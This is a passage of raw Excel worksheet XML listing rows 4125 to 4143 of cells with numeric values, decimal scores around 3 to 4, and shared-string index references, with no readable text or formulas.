        <v>3.9</v>
      </c>
      <c r="R4125" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4125" s="12" t="s">
        <v>26511</v>
      </c>
      <c r="T4125" s="12" t="s">
        <v>2645</v>
      </c>
      <c r="U4125" s="12" t="s">
        <v>26512</v>
      </c>
      <c r="V4125" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W4125" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4125" s="12">
        <v>4</v>
      </c>
      <c r="Y4125" s="12" t="s">
        <v>26513</v>
      </c>
    </row>
    <row r="4126" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4126" s="12">
        <v>57581</v>
      </c>
      <c r="B4126" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4126" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4126" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4126" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4126" s="12" t="s">
        <v>26514</v>
      </c>
      <c r="H4126" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4126" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4126" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K4126" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4126" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4126" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4126" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4126" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4126" s="12" t="s">
        <v>26515</v>
      </c>
      <c r="Q4126" s="12">
        <v>3.8</v>
      </c>
      <c r="R4126" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4126" s="12" t="s">
        <v>26516</v>
      </c>
      <c r="T4126" s="12" t="s">
        <v>26517</v>
      </c>
      <c r="U4126" s="12" t="s">
        <v>26518</v>
      </c>
      <c r="V4126" s="12" t="s">
        <v>10538</v>
      </c>
      <c r="W4126" s="12">
        <v>60798</v>
      </c>
      <c r="X4126" s="12">
        <v>27</v>
      </c>
      <c r="Y4126" s="12" t="s">
        <v>26519</v>
      </c>
    </row>
    <row r="4127" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4127" s="12">
        <v>57691</v>
      </c>
      <c r="B4127" s="12" t="s">
        <v>29861</v>
      </c>
      <c r="C4127" s="12" t="s">
        <v>29862</v>
      </c>
      <c r="D4127" s="12" t="s">
        <v>29838</v>
      </c>
      <c r="E4127" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F4127" s="12" t="s">
        <v>29859</v>
      </c>
      <c r="G4127" s="12" t="s">
        <v>26520</v>
      </c>
      <c r="H4127" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4127" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4127" s="12" t="s">
        <v>1269</v>
      </c>
      <c r="K4127" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4127" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4127" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4127" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4127" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4127" s="12" t="s">
        <v>26521</v>
      </c>
      <c r="Q4127" s="12">
        <v>3.4</v>
      </c>
      <c r="R4127" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4127" s="12" t="s">
        <v>26522</v>
      </c>
      <c r="T4127" s="12" t="s">
        <v>26523</v>
      </c>
      <c r="U4127" s="12" t="s">
        <v>26524</v>
      </c>
      <c r="V4127" s="12" t="s">
        <v>3176</v>
      </c>
      <c r="W4127" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4127" s="12">
        <v>1</v>
      </c>
      <c r="Y4127" s="12" t="s">
        <v>26525</v>
      </c>
    </row>
    <row r="4128" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4128" s="12">
        <v>57911</v>
      </c>
      <c r="B4128" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4128" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4128" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4128" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4128" s="12" t="s">
        <v>26531</v>
      </c>
      <c r="H4128" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4128" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4128" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4128" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4128" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4128" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4128" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4128" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4128" s="12">
        <v>3.9</v>
      </c>
      <c r="Q4128" s="12">
        <v>3.9</v>
      </c>
      <c r="R4128" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4128" s="12" t="s">
        <v>26532</v>
      </c>
      <c r="T4128" s="12" t="s">
        <v>26533</v>
      </c>
      <c r="U4128" s="12" t="s">
        <v>26534</v>
      </c>
      <c r="V4128" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4128" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4128" s="12">
        <v>9</v>
      </c>
      <c r="Y4128" s="12" t="s">
        <v>26535</v>
      </c>
    </row>
    <row r="4129" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4129" s="12">
        <v>58011</v>
      </c>
      <c r="B4129" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C4129" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D4129" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4129" s="12" t="s">
        <v>31523</v>
      </c>
      <c r="F4129" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G4129" s="12" t="s">
        <v>26536</v>
      </c>
      <c r="H4129" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4129" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J4129" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4129" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4129" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4129" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4129" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4129" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4129" s="12" t="s">
        <v>26537</v>
      </c>
      <c r="Q4129" s="12">
        <v>3.8</v>
      </c>
      <c r="R4129" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4129" s="12" t="s">
        <v>26538</v>
      </c>
      <c r="T4129" s="12" t="s">
        <v>11012</v>
      </c>
      <c r="U4129" s="12" t="s">
        <v>26539</v>
      </c>
      <c r="V4129" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W4129" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4129" s="12">
        <v>3</v>
      </c>
      <c r="Y4129" s="12" t="s">
        <v>26540</v>
      </c>
    </row>
    <row r="4130" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4130" s="12">
        <v>58091</v>
      </c>
      <c r="B4130" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4130" s="12" t="s">
        <v>30906</v>
      </c>
      <c r="E4130" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4130" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4130" s="12" t="s">
        <v>26551</v>
      </c>
      <c r="H4130" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4130" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4130" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4130" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4130" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4130" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4130" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4130" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4130" s="12" t="s">
        <v>22005</v>
      </c>
      <c r="Q4130" s="12">
        <v>3.9</v>
      </c>
      <c r="R4130" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4130" s="12" t="s">
        <v>26552</v>
      </c>
      <c r="T4130" s="12" t="s">
        <v>17206</v>
      </c>
      <c r="U4130" s="12" t="s">
        <v>26553</v>
      </c>
      <c r="V4130" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4130" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4130" s="12">
        <v>62</v>
      </c>
      <c r="Y4130" s="12" t="s">
        <v>26554</v>
      </c>
    </row>
    <row r="4131" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4131" s="12">
        <v>58201</v>
      </c>
      <c r="B4131" s="12" t="s">
        <v>30908</v>
      </c>
      <c r="D4131" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4131" s="12" t="s">
        <v>30909</v>
      </c>
      <c r="G4131" s="12" t="s">
        <v>26555</v>
      </c>
      <c r="H4131" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4131" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4131" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K4131" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4131" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4131" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4131" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4131" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4131" s="12">
        <v>3.9</v>
      </c>
      <c r="Q4131" s="12">
        <v>3.9</v>
      </c>
      <c r="R4131" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4131" s="12" t="s">
        <v>26556</v>
      </c>
      <c r="T4131" s="12" t="s">
        <v>26557</v>
      </c>
      <c r="U4131" s="12" t="s">
        <v>26558</v>
      </c>
      <c r="V4131" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4131" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4131" s="12">
        <v>46</v>
      </c>
      <c r="Y4131" s="12" t="s">
        <v>26559</v>
      </c>
    </row>
    <row r="4132" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4132" s="12">
        <v>58211</v>
      </c>
      <c r="B4132" s="12" t="s">
        <v>30765</v>
      </c>
      <c r="C4132" s="12" t="s">
        <v>31423</v>
      </c>
      <c r="D4132" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4132" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F4132" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4132" s="12" t="s">
        <v>26560</v>
      </c>
      <c r="H4132" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4132" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4132" s="12" t="s">
        <v>21511</v>
      </c>
      <c r="K4132" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4132" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4132" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4132" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4132" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4132" s="12" t="s">
        <v>26561</v>
      </c>
      <c r="Q4132" s="12">
        <v>3.9</v>
      </c>
      <c r="R4132" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4132" s="12" t="s">
        <v>26562</v>
      </c>
      <c r="T4132" s="12" t="s">
        <v>26563</v>
      </c>
      <c r="U4132" s="12" t="s">
        <v>26564</v>
      </c>
      <c r="V4132" s="12" t="s">
        <v>26565</v>
      </c>
      <c r="W4132" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4132" s="12">
        <v>2</v>
      </c>
      <c r="Y4132" s="12" t="s">
        <v>26566</v>
      </c>
    </row>
    <row r="4133" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4133" s="12">
        <v>58341</v>
      </c>
      <c r="B4133" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4133" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4133" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4133" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4133" s="12" t="s">
        <v>26567</v>
      </c>
      <c r="H4133" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4133" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4133" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4133" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4133" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4133" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4133" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4133" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4133" s="12" t="s">
        <v>26568</v>
      </c>
      <c r="Q4133" s="12">
        <v>3.8</v>
      </c>
      <c r="R4133" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4133" s="12" t="s">
        <v>26569</v>
      </c>
      <c r="T4133" s="12" t="s">
        <v>26570</v>
      </c>
      <c r="U4133" s="12" t="s">
        <v>26571</v>
      </c>
      <c r="V4133" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4133" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4133" s="12">
        <v>15</v>
      </c>
      <c r="Y4133" s="12" t="s">
        <v>26572</v>
      </c>
    </row>
    <row r="4134" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4134" s="12">
        <v>58401</v>
      </c>
      <c r="B4134" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4134" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4134" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4134" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4134" s="12" t="s">
        <v>26573</v>
      </c>
      <c r="H4134" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4134" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4134" s="12" t="s">
        <v>23541</v>
      </c>
      <c r="K4134" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4134" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4134" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4134" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4134" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4134" s="12" t="s">
        <v>22005</v>
      </c>
      <c r="Q4134" s="12">
        <v>3.9</v>
      </c>
      <c r="R4134" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4134" s="12" t="s">
        <v>26574</v>
      </c>
      <c r="T4134" s="12" t="s">
        <v>26575</v>
      </c>
      <c r="U4134" s="12" t="s">
        <v>26576</v>
      </c>
      <c r="V4134" s="12" t="s">
        <v>23647</v>
      </c>
      <c r="W4134" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4134" s="12">
        <v>10</v>
      </c>
      <c r="Y4134" s="12" t="s">
        <v>26577</v>
      </c>
    </row>
    <row r="4135" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4135" s="12">
        <v>58471</v>
      </c>
      <c r="B4135" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4135" s="12" t="s">
        <v>31146</v>
      </c>
      <c r="F4135" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4135" s="12" t="s">
        <v>26578</v>
      </c>
      <c r="H4135" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4135" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4135" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4135" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4135" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4135" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4135" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4135" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4135" s="12" t="s">
        <v>26542</v>
      </c>
      <c r="Q4135" s="16">
        <v>3.1</v>
      </c>
      <c r="R4135" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4135" s="12" t="s">
        <v>26579</v>
      </c>
      <c r="T4135" s="12" t="s">
        <v>25979</v>
      </c>
      <c r="U4135" s="12" t="s">
        <v>26580</v>
      </c>
      <c r="V4135" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4135" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4135" s="12">
        <v>11</v>
      </c>
      <c r="Y4135" s="12" t="s">
        <v>26581</v>
      </c>
    </row>
    <row r="4136" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4136" s="12">
        <v>58561</v>
      </c>
      <c r="B4136" s="12" t="s">
        <v>30120</v>
      </c>
      <c r="D4136" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4136" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F4136" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G4136" s="12" t="s">
        <v>26582</v>
      </c>
      <c r="H4136" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4136" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4136" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4136" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4136" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4136" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4136" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4136" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4136" s="12" t="s">
        <v>22005</v>
      </c>
      <c r="Q4136" s="12">
        <v>3.9</v>
      </c>
      <c r="R4136" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4136" s="12" t="s">
        <v>26583</v>
      </c>
      <c r="T4136" s="12" t="s">
        <v>26584</v>
      </c>
      <c r="U4136" s="12" t="s">
        <v>26585</v>
      </c>
      <c r="V4136" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W4136" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4136" s="12">
        <v>19</v>
      </c>
      <c r="Y4136" s="12" t="s">
        <v>26586</v>
      </c>
    </row>
    <row r="4137" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4137" s="12">
        <v>58591</v>
      </c>
      <c r="B4137" s="12" t="s">
        <v>30225</v>
      </c>
      <c r="D4137" s="12" t="s">
        <v>30232</v>
      </c>
      <c r="E4137" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4137" s="12" t="s">
        <v>30220</v>
      </c>
      <c r="G4137" s="12" t="s">
        <v>26587</v>
      </c>
      <c r="H4137" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4137" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4137" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4137" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4137" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4137" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4137" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4137" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4137" s="12" t="s">
        <v>26588</v>
      </c>
      <c r="Q4137" s="12">
        <v>3.9</v>
      </c>
      <c r="R4137" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4137" s="12" t="s">
        <v>26589</v>
      </c>
      <c r="T4137" s="12" t="s">
        <v>26590</v>
      </c>
      <c r="U4137" s="12" t="s">
        <v>26591</v>
      </c>
      <c r="V4137" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4137" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4137" s="12">
        <v>5</v>
      </c>
      <c r="Y4137" s="12" t="s">
        <v>26592</v>
      </c>
    </row>
    <row r="4138" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4138" s="12">
        <v>58601</v>
      </c>
      <c r="B4138" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4138" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4138" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4138" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4138" s="12" t="s">
        <v>26593</v>
      </c>
      <c r="H4138" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4138" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4138" s="12" t="s">
        <v>403</v>
      </c>
      <c r="K4138" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4138" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4138" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4138" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4138" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4138" s="12" t="s">
        <v>26594</v>
      </c>
      <c r="Q4138" s="12">
        <v>3.8</v>
      </c>
      <c r="R4138" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4138" s="12" t="s">
        <v>26595</v>
      </c>
      <c r="T4138" s="12" t="s">
        <v>26596</v>
      </c>
      <c r="U4138" s="12" t="s">
        <v>26597</v>
      </c>
      <c r="V4138" s="12" t="s">
        <v>411</v>
      </c>
      <c r="W4138" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4138" s="12">
        <v>4</v>
      </c>
      <c r="Y4138" s="12" t="s">
        <v>26598</v>
      </c>
    </row>
    <row r="4139" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4139" s="12">
        <v>58641</v>
      </c>
      <c r="B4139" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4139" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4139" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F4139" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4139" s="12" t="s">
        <v>26599</v>
      </c>
      <c r="H4139" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4139" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4139" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4139" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4139" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4139" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4139" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4139" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4139" s="12" t="s">
        <v>26600</v>
      </c>
      <c r="Q4139" s="12">
        <v>3.9</v>
      </c>
      <c r="R4139" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4139" s="12" t="s">
        <v>26601</v>
      </c>
      <c r="T4139" s="12" t="s">
        <v>26602</v>
      </c>
      <c r="U4139" s="12" t="s">
        <v>26603</v>
      </c>
      <c r="V4139" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4139" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4139" s="12">
        <v>8</v>
      </c>
      <c r="Y4139" s="12" t="s">
        <v>26604</v>
      </c>
    </row>
    <row r="4140" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4140" s="12">
        <v>58691</v>
      </c>
      <c r="B4140" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4140" s="12" t="s">
        <v>31146</v>
      </c>
      <c r="F4140" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4140" s="12" t="s">
        <v>26605</v>
      </c>
      <c r="H4140" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4140" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4140" s="12" t="s">
        <v>1269</v>
      </c>
      <c r="K4140" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4140" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4140" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4140" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4140" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4140" s="12" t="s">
        <v>26416</v>
      </c>
      <c r="Q4140" s="12">
        <v>3.8</v>
      </c>
      <c r="R4140" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4140" s="12" t="s">
        <v>26606</v>
      </c>
      <c r="T4140" s="12" t="s">
        <v>26607</v>
      </c>
      <c r="U4140" s="12" t="s">
        <v>26608</v>
      </c>
      <c r="V4140" s="12" t="s">
        <v>3176</v>
      </c>
      <c r="W4140" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4140" s="12">
        <v>15</v>
      </c>
      <c r="Y4140" s="12" t="s">
        <v>26609</v>
      </c>
    </row>
    <row r="4141" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4141" s="12">
        <v>58761</v>
      </c>
      <c r="B4141" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4141" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4141" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4141" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4141" s="12" t="s">
        <v>26610</v>
      </c>
      <c r="H4141" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4141" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4141" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K4141" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4141" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4141" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4141" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4141" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4141" s="12" t="s">
        <v>26611</v>
      </c>
      <c r="Q4141" s="12">
        <v>3.9</v>
      </c>
      <c r="R4141" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4141" s="12" t="s">
        <v>26612</v>
      </c>
      <c r="T4141" s="12" t="s">
        <v>26613</v>
      </c>
      <c r="U4141" s="12" t="s">
        <v>26614</v>
      </c>
      <c r="V4141" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4141" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4141" s="12">
        <v>31</v>
      </c>
      <c r="Y4141" s="12" t="s">
        <v>26615</v>
      </c>
    </row>
    <row r="4142" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4142" s="12">
        <v>58881</v>
      </c>
      <c r="B4142" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4142" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4142" s="12" t="s">
        <v>31502</v>
      </c>
      <c r="F4142" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4142" s="12" t="s">
        <v>26616</v>
      </c>
      <c r="H4142" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4142" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4142" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4142" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4142" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4142" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4142" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4142" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4142" s="12" t="s">
        <v>26617</v>
      </c>
      <c r="Q4142" s="12">
        <v>3.9</v>
      </c>
      <c r="R4142" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4142" s="12" t="s">
        <v>26618</v>
      </c>
      <c r="T4142" s="12" t="s">
        <v>26619</v>
      </c>
      <c r="U4142" s="12" t="s">
        <v>26620</v>
      </c>
      <c r="V4142" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4142" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4142" s="12">
        <v>13</v>
      </c>
      <c r="Y4142" s="12" t="s">
        <v>26621</v>
      </c>
    </row>
    <row r="4143" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4143" s="12">
        <v>58911</v>
      </c>
      <c r="B4143" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D4143" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4143" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4143" s="12" t="s">
        <v>26622</v>
      </c>
      <c r="H4143" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4143" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4143" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K4143" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4143" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4143" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4143" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4143" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4143" s="12" t="s">
        <v>26611</v>
      </c>
      <c r="Q4143" s="12">
        <v>3.9</v>
      </c>
      <c r="R4143" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4143" s="12" t="s">
        <v>26623</v>
      </c>
      <c r="T4143" s="12" t="s">
        <v>26624</v>
      </c>
      <c r="U4143" s="12" t="s">
        <v>26625</v>
      </c>
      <c r="V4143" s="12" t="s">
        <v>26626</v>
      </c>
